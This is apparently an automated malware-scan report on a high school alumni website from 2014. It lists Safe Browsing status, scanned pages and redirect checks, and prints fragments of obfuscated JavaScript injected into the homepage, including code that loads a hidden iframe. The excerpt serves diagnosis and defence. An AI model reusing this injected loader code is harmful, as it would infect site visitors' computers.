Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=everetthighschool.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://everetthighschool.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 09:37:27 GMT Location: http://www.everetthighschool.org/ Server: Apache Content-Length: 312 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.everetthighschool.org/ | 200 OK Content-Length: 30898 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) qbcj="s"+"p"+"li"+"t";kgv=window;aeqjne="dy";kkkzf=document;iswi="0x";qqz=(5-3-1);try{++(kkkzf.body)}catch(ekel){xoyr=false;try{}catch(araai){xoyr=21;}if(1){rmvb="17:5d:6c:65:5a:6b:60:66:65:17:60:66:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:66:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 Decoded script: try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.everetthighschool.org/Class%20of%2074%20Individual%20Classmates/index.html | 404 Not Found Content-Length: 436 Content-Type: text/html | clean |
http://www.everetthighschool.org/test404page.js | 404 Not Found Content-Length: 406 Content-Type: text/html | clean |
http://everetthighschool.org/Reunion%20Pictures%20Mike%27s%20Camera/index.htm | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 09:37:29 GMT Location: http://www.everetthighschool.org/Reunion%20Pictures%20Mike's%20Camera/index.htm Server: Apache Content-Length: 358 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.everetthighschool.org/reunion%20pictures%20mike's%20camera/index.htm | 404 Not Found Content-Length: 432 Content-Type: text/html | clean |
http://everetthighschool.org/Reunion%20Pictures%20Krebs/index.htm | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 09:37:31 GMT Location: http://www.everetthighschool.org/Reunion%20Pictures%20Krebs/index.htm Server: Apache Content-Length: 348 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.everetthighschool.org/reunion%20pictures%20krebs/index.htm | 404 Not Found Content-Length: 424 Content-Type: text/html | clean |
http://everetthighschool.org/Hal%20Wade%20Pics/index.htm | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 09:37:32 GMT Location: http://www.everetthighschool.org/Hal%20Wade%20Pics/index.htm Server: Apache Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.everetthighschool.org/hal%20wade%20pics/index.htm | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://everetthighschool.org/Everett%20HS%20Pictures%20of%20Memory/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 09:37:32 GMT Location: http://www.everetthighschool.org/Everett%20HS%20Pictures%20of%20Memory/index.html Server: Apache Content-Length: 360 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.everetthighschool.org/everett%20hs%20pictures%20of%20memory/index.html | 404 Not Found Content-Length: 432 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: everetthighschool.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 09:37:27 GMT
Location: http://www.everetthighschool.org/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
GET / HTTP/1.1
Host: everetthighschool.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 09:37:27 GMT
Location: http://www.everetthighschool.org/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: everetthighschool.org
Referer: http://www.google.com/search?q=everetthighschool.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: everetthighschool.org
Referer: http://www.google.com/search?q=everetthighschool.org
Result:
The result is similar to the first query. There are no suspicious redirects found.